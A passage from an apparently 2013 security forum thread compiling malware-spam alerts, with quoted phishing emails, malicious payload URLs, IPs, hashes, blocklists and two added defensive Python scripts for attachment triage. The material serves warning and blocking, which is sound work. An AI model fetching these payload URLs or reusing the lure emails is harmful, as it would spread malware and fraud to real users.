Attached is a ZIP file, in this case called Scan_06122013_29911.zip which in turn contains an executable Scan_06122013_29911.exe. Note that the date is encoded into the filename so future versions will be different. VirusTotal results are 23/47* which is typically patchy. Comodo CAMAS reports** that the malware attempts to phone home to forum.xcpus .com on 71.19.227.135 and has the following checksums:
MD5 8fcba93b00dba3d182b1228b529d3c9e
SHA1 54f02f3f1d6954f98e14a9cee62787387e5b072c
SHA256 544c08f288b1102d6304e9bf3fb352a8fdfb59df93dc4ecc0f753dd30e39da0c
... the ThreatTrack report [pdf]*** is more detailed and also identifies the following domains and IPs which are probably worth blocking or looking out for:
71.19.227.135
205.178.152.164
198.173.244.62
204.8.121.24
195.110.124.133
173.246.106.150 ..."
* https://www.virustotal.com/en/file/544c08f288b1102d6304e9bf3fb352a8fdfb59df93dc4ecc0f753dd30e39da0c/analysis/1371077066/
File name: Scan_06122013_29911.exe
Detection ratio: 23/47
Analysis date: 2013-06-12
** http://camas.comodo.com/cgi-bin/submit?file=544c08f288b1102d6304e9bf3fb352a8fdfb59df93dc4ecc0f753dd30e39da0c
*** http://www.dynamoo.com/files/analysis_31187_8fcba93b00dba3d182b1228b529d3c9e.pdf
___
Fake Fedex SPAM / oxfordxtg .net
- http://blog.dynamoo.com/2013/06/fedex-spam-oxfordxtgnet.html
12 June 2013 - "This fake FedEx spam leads to malware on oxfordxtg .net:
Date: Thu, 13 Jun 2013 01:18:09 +0800 [13:18:09 EDT]
From: FedEx [wringsn052 @emc.fedex .com]
Subject: Your Fedex invoice is ready to be paid now.
FedEx(R) FedEx Billing Online - Ready for Payment
fedex.com
Hello [redacted]
You have a new outstanding invoice(s) from FedEx that is ready for payment.
The following ivoice(s) are to be paid now :
Invoice Number
5135-13792
To pay or review these invoices, please sign in to your FedEx Billing Online account by clicking on this link: http ://www.fedex .com/us/account/fbo
Note: Please do not use this email to submit payment. This email may not be used as a remittance notice. To pay your invoices, please visit FedEx Billing Online, http ://www.fedex .com/us/account/fbo
Thank you,
Revenue Services
FedEx...
Screenshot: https://lh3.ggpht.com/-gOwdBh9V5Os/Ubj285rgYBI/AAAAAAAABRs/ugqVeCeHUVo/s1600/fedex.png
The link in the email goes through a legitimate hacked site and ends up on a malware payload page at [donotclick]oxfordxtg .net/news/absence_modern-doe_byte.php (report here*) hosted on:
124.42.68.12 (Langfang University, China)
190.93.23.10 (Greendot, Trinidad and Tobago)
The following partial blocklist covers these two IPs, but I recommend you also apply this larger blocklist of related sites** as well.
124.42.68.12
190.93.23.10 ..."
* http://urlquery.net/report.php?id=3082461
** http://blog.dynamoo.com/2013/06/malware-sites-to-block-12613.html
___
Fake "'Anonymous' sent you a payment" emails...
- http://security.intuit.com/alert.php?a=83
6/12/13 - "People are receiving fake emails with the title "X sent you a payment (where X is a person's name)." Below is a copy of the email people are receiving:
Screenshot: http://security.intuit.com/images/paymentnetwork.jpg
This is the end of the fake email.
Steps to Take Now
Do -not- open the attachment in the email...
Delete the email..."
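The attachment runs quoted in this thread share a few mechanical traits: a ZIP wrapping an EXE, executables named to look like documents ("secure.pdf.exe", "Fax details and transmission_report.doc.exe"), the date encoded into the filename ("Scan_06122013_29911.exe", "CD06072013.239871839.exe") so that signatures on the name go stale daily, and, in the Xerox WorkCentre run above, a From: address in the victim's own domain. The following is an added example, not code from this thread or from the blogs it quotes: it builds a constructed message in memory mirroring the Xerox run and applies those checks to the attachment, reading the archive members' magic bytes rather than trusting the extension. The "victimdomain.com" name, the message text and the fake PE bytes are assumptions constructed for the example; the domain check is a heuristic and not a substitute for SPF/DKIM/DMARC at the gateway.

```python
"""Triage a mail attachment for the traits of the spam runs quoted above (added example)."""
import email
import email.policy
import email.utils
import io
import re
import zipfile
from email.message import EmailMessage
from typing import Dict, List

DATE_STEM = re.compile(r"(?<!\d)(\d{8}|\d{6})(?!\d)")        # Scan_06122013_29911, CD06072013
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|jpg|txt|htm|html)\.(exe|scr|com|pif|bat)$", re.I)
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs")


def build_sample_eml() -> bytes:
    """Constructed message mirroring the Xerox WorkCentre run; the 'PE' bytes are not a real program."""
    payload = b"MZ" + b"\x90" * 62 + b"PE\0\0" + b"\0" * 100
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Scan_06122013_29911.exe", payload)
    msg = EmailMessage()
    msg["From"] = "Xerox WorkCentre <Xerox.Device9@victimdomain.com>"   # assumed victim domain
    msg["To"] = "accounts@victimdomain.com"
    msg["Subject"] = "Scan from a Xerox WorkCentre"
    msg.set_content("Please download the document. It was scanned and sent to you "
                    "using a Xerox multifunction device.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="Scan_06122013_29911.zip")
    return msg.as_bytes()


def domain_of(addr: str) -> str:
    return email.utils.parseaddr(addr)[1].rsplit("@", 1)[-1].lower()


def inspect_archive(data: bytes) -> List[str]:
    """Findings for each member: executable by magic or extension, document.exe names, date stems."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            with zf.open(info) as member:
                head = member.read(2)
            if head == b"MZ":
                findings.append(f"pe-executable:{name}")
            elif name.lower().endswith(EXEC_EXT):
                findings.append(f"executable-extension:{name}")
            if DOUBLE_EXT.search(name):
                findings.append(f"double-extension:{name}")
            if DATE_STEM.search(name):
                findings.append(f"date-stamped-name:{name}")
    return findings


def triage(raw: bytes) -> Dict[str, object]:
    """Return a verdict and the list of findings for one raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    findings: List[str] = []
    sender, recipient = domain_of(str(msg["From"])), domain_of(str(msg["To"]))
    if sender and sender == recipient:
        findings.append(f"from-own-domain:{sender}")          # external mail claiming our own domain
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        if data[:2] == b"PK":
            findings.extend(inspect_archive(data))
        elif data[:2] == b"MZ":
            findings.append(f"pe-executable:{fname}")
    hard = ("pe-executable", "executable-extension", "double-extension")
    verdict = "quarantine" if any(f.startswith(hard) for f in findings) else "deliver"
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    print(triage(build_sample_eml()))
```

Only the executable findings decide the verdict; the date-stamped name and the own-domain sender are recorded as context, since either alone also occurs in legitimate mail. Reading the first two bytes of each member catches the case the posts keep hitting, a PE file with zero or near-zero AV detection, which a hash or name blocklist would miss on the next day's build.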
AplusWebMaster
2013-06-14, 00:58
FYI...
Fake eFax Corporate SPAM...
- http://threattrack.tumblr.com/post/52887323784/efax-corporate-spam
June 13, 2013 - "Subjects Seen:
Corporate eFax message from “unknown” - 4 page(s)
Typical e-mail details:
You have received a 4 page fax at 2013-06-10 11:52:46 EST.
* The reference number for this fax [removed] .
Please visit efaxcorporate .com/corp/twa/page/customerSupport if you have any questions regarding this message or your service. You may also e-mail our corporate support department at corporatesupport @mail .efax .com.
Thank you for using the eFax Corporate service!
Malicious URLs
50.63.46.110 /erected/index.html
74.91.143.180 /frosting/index.html
weedguardplus .net/news/pictures_hints_causes.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0b08a6a6fc5ac9482b72ca0205851a20/tumblr_inline_mocjtcxZRg1qz4rgp.png
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment Email Messages - 2013 Jun 13
Fake Secure Message Notification Email Messages - 2013 Jun 13
Malicious Attachment Email Messages - 2013 Jun 13
Fake Product Order Quotation E-mail Messages - 2013 Jun 13
Fake Money Transfer Notification E-mail Messages - 2013 Jun 13
Fake Product Order E-mail Messages - 2013 Jun 13
Fake Bill Payment Notification Email Messages - 2013 Jun 13
Fake Bill Payment Notification Email Messages - 2013 Jun 13
Fake Bank Payment Request Notification E-mail Messages - 2013 Jun 13
(More detail and links at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-06-14, 18:24
FYI...
Fake LinkedIn SPAM...
- http://threattrack.tumblr.com/post/52945930175/linkedin-invitation-spam
June 14, 2013 - "Subjects Seen:
Invitation to connect on LinkedIn
Typical e-mail details:
Hattie Fitzgerald, wants to connect with you on LinkedIn.
Malicious URLs
50.63.46.110 /jotted/index.html
audio-mastering-music .com/news/pictures_hints_causes.php?jnlp=bd187af1d0
audio-mastering-music .com/news/pictures_hints_causes.php?rwiezly=qzxqjh&rzvaax=abldjf
audio-mastering-music .com/news/pictures_hints_causes.php?pf=2w:1l:1n:1f:1j&ze=2w:31:1g:1n:1m:2v:33:1g:31:1f&x=1f&xu=s&ma=o&jopa=1715713
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c5ac6e133dd1f10b6a885b3bc82c26b5/tumblr_inline_modyjkiIOr1qz4rgp.png
___
Fake UPS Package Pickup Spam
- http://threattrack.tumblr.com/post/52951986728/ups-package-pickup-spam
June 14, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel [removed] )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
bestseoamerica .com/ponyb/gate.php
austinremoterecording .com/ponyb/gate.php
audiomasteringsearch .com/ponyb/gate.php
audiomasteringmeistro .com/ponyb/gate.php
sistersnstyle .co/4bnsSjBb.exe
destinationgreece .com/7tW.exe
villa-anastasia-crete .com/JWHvdgW.exe
kahrobaa .com/14VkWHU0 .exe
Malicious File Name and MD5:
UPS_Label_<random>.zip (05c33cfcf22c5736c4a162f6d7c2eeac)
UPS-Label_Parcel_<random>.exe (bc48d3e736c66f577636ed486a990eeb)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/59efc3e44c5392150b83b4b0128996b5/tumblr_inline_moe43yZKRF1qz4rgp.png
:mad: :fear:
AplusWebMaster
2013-06-17, 15:33
FYI...
Something evil on 85.214.64.153
- http://blog.dynamoo.com/2013/06/something-evil-on-8521464153.html
17 June 2013 - "85.214.64.153 is an IP belonging to Strato AG in Germany, it appears to host some legitimate sites but the server seems to be serving up the Neutrino exploit kit (example*) which is being injected into -hacked- websites (specifically, malicious code is being appended to legitimate .js files on those sites)... Dynamic DNS domains are being abused in this attack... These sites are mostly flagged as malicious by Google, you can see some indicators of badness here** and here***..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=3112582
** https://www.virustotal.com/en/ip-address/85.214.64.153/information/
*** http://urlquery.net/search.php?q=85.214.64.153&type=string&start=2013-06-02&end=2013-06-17&max=50
Diagnostic page for AS6724 (STRATO)
- https://www.google.com/safebrowsing/diagnostic?site=AS:6724
"... over the past 90 days, 7173 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-06-17, and the last time suspicious content was found was on 2013-06-17... we found 909 site(s) on this network... that appeared to function as intermediaries for the infection of 7496 other site(s)... We found 1434 site(s)... that infected 14549 other site(s)..."
___
Account takeover attempts nearly double ...
- https://net-security.org/secworld.php?id=15077
17 June 2013 - "ThreatMetrix* announced its Cybercrime Index, a series of Web fraud data aggregated from 1,500 customers, 9,000 websites and more than 1.7 billion cyber events. In a recent six-month snapshot ending March 31, ThreatMetrix determined that attacks on new account registrations using spoofed and synthetic identities saw the highest rate of attacks followed by account logins and payment fraud...
> http://www.threatmetrix.com/wp-content/uploads/2013/06/ThreatMetrix-Cybercrime-Index1.jpeg
Based on data taken from October 2012 through March 2013, they saw account takeover attempts nearly double (168%). These types of attacks have traditionally focused on banking and brokerage sites, but have recently escalated across e-commerce sites that store credit card details and SaaS companies that hold valuable customer data that do not yet have the heightened level of protection as banking sites..."
* http://www.threatmetrix.com/threatmetrix-network-data-finds-new-accounts-account-for-highest-rate-of-cyberattacks-with-takeover-attempts-close-to-doubling-over-6-months/
___
Rogue ads target EU users - Win32/Toolbar.SearchSuite through the KingTranslate PUA
- http://blog.webroot.com/2013/06/17/rogue-ads-target-eu-users-expose-them-to-win32toolbar-searchsuite-through-the-kingtranslate-pua/
June 17, 2013 - "... Tens of thousands of socially engineered European ads, who continue getting exposed to the rogue ads served through Yieldmanager’s network, are promoting more Potentially Unwanted Applications (PUAs) courtesy of Bandoo Media Inc and their subsidiary Koyote-Lab Inc...
Sample screenshots of the rogue KingTranslate PUA landing/download page:
1) https://webrootblog.files.wordpress.com/2013/06/kingtranslate_pua_01.png?w=659&h=496
2) https://webrootblog.files.wordpress.com/2013/06/kingtranslate_pua.png?w=592&h=550
... Rogue URL: kingtranslate .com – 109.201.151.95
Detection rate for the PUA: KingTranslateSetup-r133-n-bc.exe – MD5: 51d98879782d176ababcd8d47050f89f * ... Win32/Toolbar.SearchSuite...
We advise users to avoid using this application and to consider other free, legitimate translation services such as, for instance, Google Translate or Bing’s Translator."
* https://www.virustotal.com/en/file/3ae8a711796ba437e556881ea0f528dfbfd9d021e0d2edb8177f4bb788427d00/analysis/
File name: KingTranslateSetup-r120-n-bu.exe
Detection ratio: 3/46
Analysis date: 2013-06-16
___
Dun & Bradstreet Complaint Spam
- http://threattrack.tumblr.com/post/53202346878/dun-bradstreet-complaint-spam
June 17, 2013 - "Subjects Seen:
FW : Complaint - [removed]
Typical e-mail details:
Dun & Bradstreet has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
In the interest of time and good customer relations, please provide the DnB with written verification of your position in this matter by June 28, 2013. Your prompt response will allow DnB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Dun & Bradstreet develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Malicious URLs
iguttersupply .com/ponyb/gate.php
micromeshleafguard .com/ponyb/gate.php
ornamentalgutters .com/ponyb/gate.php
radiantcarbonheat .com/ponyb/gate.php
sistersnstyle .co/4bnsSjBb.exe
destinationgreece .com/7tW.exe
backup.hellaswebnews .com/8P6j4.exe
elenaseller .net/jKK1NMDt.exe
Malicious File Name and MD5:
Case_<random>.zip (3001dc82f5cb98b60326e7f8490488cf)
Case_<random>.exe (9c862af9a540563488cdc1c61b9ef5f8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/94b783ce0fb83b72db7fbfbdea651b41/tumblr_inline_mojpev7osN1qz4rgp.png
___
Fake NewEgg .com SPAM / profurnituree .com
- http://blog.dynamoo.com/2013/06/neweggcom-spam-profurnitureecom.html
17 June 2013 - "This fake NewEgg .com spam leads to malware on profurnituree .com:
Date: Mon, 17 Jun 2013 20:09:35 +0300 [13:09:35 EDT]
From: Newegg Auto-Notification [indeedskahu02 @services.neweg .com]
Subject: Newegg.com - Payment Charged ...
Screenshot: https://lh3.ggpht.com/-aC2D_mxMnTE/Ub9UBlLpIAI/AAAAAAAABTw/cuteVRRx9Mo/s1600/newegg3.png
The link goes through a legitimate -hacked- site and ends up on a malware landing page at [donotclick]profurnituree .com/news/posts_applied_deem.php (report here*) although the payload appears to be 404ing (I wouldn't trust that though). The domain is hosted on the following IPs:
124.232.165.112 (China Telecom, China)
186.215.126.52 (Global Village Telecom, Brazil)
190.93.23.10 (Greendot, Trinidad and Tobago)
202.147.169.211 (LINKdotNET Telecom Limited, Pakistan)
The domain registration details are fake... Below is a partial blocklist which I recommend you use in conjunction with this list.
124.232.165.112
186.215.126.52
190.93.23.10
202.147.169.211 ..."
* http://urlquery.net/report.php?id=3180371
:mad: :fear:
AplusWebMaster
2013-06-18, 17:42
FYI...
Fake UPS SPAM / rmacstolp .net
- http://blog.dynamoo.com/2013/06/ups-spam-rmacstolpnet.html
18 June 2013 - "This fake UPS spam leads to malware on rmacstolp .net:
Date: Tue, 18 Jun 2013 01:21:34 -0800 [05:21:34 EDT]
From: UPSBillingCenter @upsmail .net
Subject: Your UPS Invoice is Ready
UPS Billing Center
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
Thank you for your business.
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center.
Please visit the UPS Billing Center to view your paid invoice.
Questions about your charges? To get a better understanding of surcharges on your invoice, click here.
Discover more about UPS:
Visit ups .com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
© 2013 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The link in the email goes through a legitimate -hacked- site but then ends up on a malicious payload at [donotclick]rmacstolp .net/news/fishs_grands.php (report here* and here**). The payload appears to be the Blackhole Exploit kit, but the site seems to be either not working or (more likely) is being resistant to analysis. If not called properly, the malware appears to serve up random payload pages.. I think they may be fake ones to evade detection. Here are some of them:
[donotclick]shop.babeta .ru/ftyxsem.php
[donotclick]kontra-antiabzocker .net/cpdedlp.php
[donotclick]www.cyprusivf .net/iabsvkc.php
[donotclick]clubempire .ru/ayrwoxt.php
[donotclick]artstroydom .com/rwlqqtq.php
[donotclick]www.masthotels .gr/ysmaols.php
rmacstolp .net is hosted on the following IPs:
186.215.126.52 (Global Village Telecom, Brazil)
190.93.23.10 (Greendot, Trinidad and Tobago)
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
202.147.169.211 (LINKdotNET Telecom Limited, Pakistan)
Recommended blocklist:
186.215.126.52
190.93.23.10
193.254.231.51
202.147.169.211 ..."
* http://wepawet.iseclab.org/view.php?hash=ae660c5b01a9a3cb73ce83c906b28d8d&t=1371562967&type=js
** http://urlquery.net/report.php?id=3197446
___
Fake - Wells Fargo attachment Spam
- http://threattrack.tumblr.com/post/53282231311/wells-fargo-attachment-spam
June 18, 2013 - "Subjects Seen:
IMPORTANT Documents- WellsFargo
Typical e-mail details:
Please check attached documents.
Chuck_Vega
Wells Fargo Advisors
817-889-5857 office
817-353-6685 cell Chuck_Vega @wellsfargo.com
ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.
To unsubscribe from marketing e-mails from:
· An individual Wells Fargo Advisors financial advisor: Reply to one of his/her e-mails and type “Unsubscribe” in the subject line.
· Wells Fargo and its affiliates: Unsubscribe at wellsfargoadvisors.com/unsubscribe.
Neither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit wellsfargoadvisors .com/disclosures/email-disclosure.html .
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103
Malicious URLs
thinkgreensupply .com/ponyb/gate.php
pacificcontractsources .com/ponyb/gate.php
tpi-ny.com/ponyb/gate .php
50shadesofshades .com/ponyb/gate.php
sistersnstyle .co/4bnsSjBb.exe
destinationgreece .com/7tW.exe
backup.hellaswebnews .com/8P6j4.exe
elenaseller .net/jKK1NMDt.exe
Malicious File Name and MD5:
WellsFargo_<random>.zip (3001dc82f5cb98b60326e7f8490488cf)
WellsFargo_<random>.exe (3c671b9f969a7ba0a9d9b532840c4ea2)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d7799f2594a198c2fa7d8933acf54951/tumblr_inline_molifnblxa1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-06-19, 15:23
FYI...
Something evil on 205.234.139.169
- http://blog.dynamoo.com/2013/06/something-evil-on-205234139169.html
19 June 2013 - "205.234.139.169 (Hostforweb, US) appears to be hosting a bunch of Java exploits being served up on subdomains of hacked GoDaddy domains. The malware looks like it is being served up in some sort of injection attack. Here are some example URLs of badness:
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/applet.jnlp
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/contact.php
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/xXsdYVRQe.class
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/xXsdYVRQe/class.class
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/jfygZbFu
URLquery* and VirusTotal** are not very conclusive, but if it walks like a duck and quacks like a duck.. well, you know the rest.
The following domains appear to be hosted on the server. You should assume that they are all malicious, ones already flagged by Google ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/search.php?q=205.234.139.169&type=string&start=2013-06-04&end=2013-06-19&max=50
** https://www.virustotal.com/en/ip-address/205.234.139.169/information/
___
Fake HP Digital Device Spam
- http://threattrack.tumblr.com/post/53361730606/hp-digital-device-spam
June 19, 2013 - "Subjects Seen:
Scanned Copy
Typical e-mail details:
Please open the attached document. This document was digitally sent to you using an HP Digital Sending device.
To view this document you need to use the Adobe Acrobat Reader.
Malicious URLs
bagdup .com/ponyb/gate.php
baggagereviews .com/ponyb/gate.php
bagpreview .com/ponyb/gate.php
mpricecs .com .au/ceAZfkX6.exe
serw.myroitracking .com/nokxk.exe
omnicomer .com/qT6DM.exe
sweethomesorrento .it/kNH827.exe
Malicious File Name and MD5:
HP_Scan_<random>.zip (d17aab950060319ea41b038638375268)
HP_Scan_<random>.exe (eab3a43d077661ca1c9549df49477ddb)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/99a3f9f6abd4b28802a95985fda61d60/tumblr_inline_monbpvOdIV1qz4rgp.png
HP Spam / HP_Scan_06292013_398.zip FAIL
- http://blog.dynamoo.com/2013/06/hp-spam-hpscan06292013398zip-fail.html
June 19, 2013 - "I've been seeing these spams for a couple of days now..
Date: Wed, 19 Jun 2013 09:39:27 -0500 [10:39:27 EDT]
From: HP Digital Device [HP.Digital0 @victimdomain ]
Subject: Scanned Copy
Please open the attached document. This document was digitally sent to you using an HP Digital Sending device.
To view this document you need to use the Adobe Acrobat Reader...
There is an attachment called HP_Scan_06292013_398.zip. Obviously this is an attempt to deliver malware.. but the attachment is too small to have a payload. Initially I thought that it was some random part of somebody's security infrastructure stripping it off until I got a really clean copy.. and the ZIP file was just 8 bytes:
12 BA E8 AC 16 AC 7B AE
Another sample version looks like this, with just 6 bytes:
12 BA E8 AC 16 AC
Googling for 12BAE8AC16AC or 12BAE8AC16AC7BAE gets nothing at all (well, except it will now I've blogged about it)..."
___
65+ websites compromised to deliver malvertising
- https://net-security.org/malware_news.php?id=2519
June 19, 2013 - "At least 65 different sites serving ads that ultimately led to malware have been spotted by Zscaler researchers*. The massive malvertising campaign started with injected code into the ads served on the sites, and were delivered from several domains, all resolving to the following IP address: 89.45.14.87... The compromised sites were an assortment of random small and medium-sized sites, and among them was the official site for Government Security News..."
* http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html
June 18, 2013 - "On Monday, Government Security News (GSN), reported that their website had been compromised during a mass infection. While in the case of the GSN infection, the injected content was delivered from googlecodehosting.com, we have determined that the same content was also delivered from googlecodehosting.org and googlecodehosting.net, all of which resolve to 89.45.14.87 and are now offline. In reviewing our logs for sites with the aforementioned referrers, indicating that they too were/are compromised, we have thus far identified 65 different sites... Referers for the GSN site appeared as early as Jun 14th, suggesting that the site was likely compromised for a couple of days before they became aware of the situation and took steps to clean the site..."
:fear::mad:
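The dynamoo write-up quoted in the post above notes that the HP_Scan_*.zip attachment is only 8 (or 6) bytes, far too small to be an archive. Here is a triage check that judges a ".zip" attachment by its bytes rather than its file name, as an added example that is not part of the post or of dynamoo's analysis: it uses Python's standard zipfile module, the two byte strings are the ones quoted in the post, and the build_sample_archive helper and the HP_Scan_000.exe member name are constructed for comparison.

```python
import io
import zipfile

# Byte strings quoted in the dynamoo post above: the 8-byte and 6-byte "ZIP" attachments.
TRUNCATED_8 = bytes.fromhex("12BAE8AC16AC7BAE")
TRUNCATED_6 = bytes.fromhex("12BAE8AC16AC")

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # first local file header of a normal archive
ZIP_EMPTY_ARCHIVE = b"PK\x05\x06"  # end-of-central-directory record of an empty archive


def classify_zip_attachment(data: bytes) -> dict:
    """Return a verdict for a blob that claims to be a .zip attachment.

    Checks, in order: minimum size for any ZIP structure, the leading
    signature, and whether the central directory actually parses. None of
    the checks looks at the file name, which is all the spam relies on.
    """
    verdict = {"size": len(data), "signature_ok": False, "parses": False, "members": []}
    # The smallest valid ZIP is the 22-byte end-of-central-directory record.
    if len(data) < 22:
        verdict["reason"] = "too small to be a ZIP archive"
        return verdict
    verdict["signature_ok"] = data[:4] in (ZIP_LOCAL_HEADER, ZIP_EMPTY_ARCHIVE)
    if not verdict["signature_ok"]:
        verdict["reason"] = "missing PK signature"
        return verdict
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            verdict["members"] = zf.namelist()
            verdict["parses"] = True
            verdict["reason"] = "ok"
    except zipfile.BadZipFile as exc:
        verdict["reason"] = f"central directory unreadable: {exc}"
    return verdict


def build_sample_archive(member: str, payload: bytes) -> bytes:
    """Constructed, valid archive for comparison (not a sample from the post)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, payload)
    return buf.getvalue()


def looks_executable_inside(verdict: dict) -> bool:
    """Flag archives whose members carry an executable extension, the
    ZIP-wrapping-EXE pattern the ThreatTrack reports in this thread describe."""
    return any(name.lower().endswith((".exe", ".scr", ".pif", ".com"))
               for name in verdict["members"])


if __name__ == "__main__":
    samples = (
        ("8-byte sample", TRUNCATED_8),
        ("6-byte sample", TRUNCATED_6),
        ("constructed archive", build_sample_archive("HP_Scan_000.exe", b"MZ...")),
    )
    for label, blob in samples:
        v = classify_zip_attachment(blob)
        print(f"{label}: {v['reason']}; members={v['members']}; "
              f"executable inside={looks_executable_inside(v)}")
```

Both quoted byte strings fail at the size check, so a gateway rule built on this would have dropped the mail before any name-based rule ran; the constructed archive parses and is then flagged for carrying an .exe member.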
AplusWebMaster
2013-06-20, 13:40
FYI...
Linkedin DNS Hijack
- https://isc.sans.edu/diary.html?storyid=16037
Last Updated: 2013-06-20 - "LinkedIn had its DNS "hijacked". There are no details right now, but often this is the result of an attacker compromising the account used to manage DNS servers... so far, no details are available so this could be just a simple misconfiguration. The issue has been resolved, but if LinkedIn is "down" for you, or if it points to a different site, then you should flush your DNS cache. It does not appear that Linkedin uses DNSSEC (which may not have helped if the registrar account was compromised). Your best bet to make sure you connect to the correct site is SSL... "owning" the domain may allow the attacker to create a new certificate rather quickly... other sites are affected as well... The fact that multiple sites' NS records are affected implies that this may not be a simple compromised registrar account... According to:
- http://blog.escanav.com/2013/06/20/dns-hijack/ , the bad IP address is 204.11.56.17* ..."
Diagnostic page for AS40034 (CONFLUENCE)
* https://www.google.com/safebrowsing/diagnostic?site=AS:40034
"... over the past 90 days, 413 site(s).. served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-06-20, and the last time suspicious content was found was on 2013-06-20... we found 45 site(s) on this network... that appeared to function as intermediaries for the infection of 82 other site(s)... We found 347 site(s)... that infected 4358 other site(s)..."
- http://technet.microsoft.com/en-us/library/cc781949%28v=WS.10%29.aspx
"... Open Command Prompt. Type: ipconfig /flushdns ..."
- https://atlas.arbor.net/briefs/
Elevated Severity
June 20, 2013
An emergent issue involving what's been called "domain hijacking" has taken place involving a number of prominent web properties. Some concern has been expressed that the problem may be part of an attack campaign, despite statements to the contrary.
Analysis: Any type of traffic headed towards any web property that is pointing to an unexpected location - due to a DNS hijack, a hosts file hijack, man-in-the-middle, man-in-the-browser, phishing, pharming, or whatever other technique - carries some risk of delivering sensitive information, credentials, mail contents, or other data to an unexpected party, that may be malicious. Indicators suggest that some type of error was involved in this incident, however there are larger concerns at play that will likely emerge in a more widespread manner in the near future.
Source: http://isc.sans.edu/diary/Linkedin+DNS+Hijack/16037
___
Fake ADP SPAM / planete-meuble-pikin .com
- http://blog.dynamoo.com/2013/06/adp-spam-planete-meuble-pikincom.html
20 June 2013 - "This fake ADP spam leads to malware on planete-meuble-pikin .com:
Date: Thu, 20 Jun 2013 07:12:28 -0600
From: EasyNetDoNotReply @clients.adpmail .org
Subject: ADP EasyNet: Bank Account Change Alert
Dear Valued ADP Client,
As part of ADP's commitment to provide you with exceptional service, ADP is taking additional steps to ensure that your payroll data is secure. Therefore, we are sending you this e-mail as a security precaution to confirm that you have added or changed a bank account for the following employee(s) on your account:
** Dominic Johnson **
** Ayden Campbell **
Use this links to: Review or Decline this changes.
If you have not made and authorized this bank account change, please contact your ADP Service Team immediately.
This security precaution is another reason why so many businesses like yours choose ADP, the world's leading payroll provider for over 60 years, to handle their payroll.
Sincerely,
Your ADP Service Team
This e-mail comes from an unattended mailbox. Please do not reply.
The link in the email goes through a legitimate but -hacked- site and ends up on a malware landing page at [donotclick]planete-meuble-pikin .com/news/network-watching.php (report here*) hosted on:
173.254.254.110 (Quadranet, US)
190.93.23.10 (Greendot, Trinidad and Tobago)
